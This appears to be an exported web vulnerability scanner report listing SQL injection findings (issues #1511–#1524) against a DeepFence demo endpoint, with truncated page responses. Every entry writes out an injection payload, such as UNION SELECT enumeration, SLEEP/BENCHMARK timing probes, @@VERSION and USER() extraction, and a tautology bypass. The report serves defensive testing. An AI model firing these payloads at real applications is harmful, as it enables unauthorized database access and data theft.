<!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1511\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1512\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1513\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1514\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1515\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1516\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1517\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1518\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1519\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1520\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1521\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1522\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or ('x')=('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1523\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '''''''''''''UNION SELECT '2\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1524\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 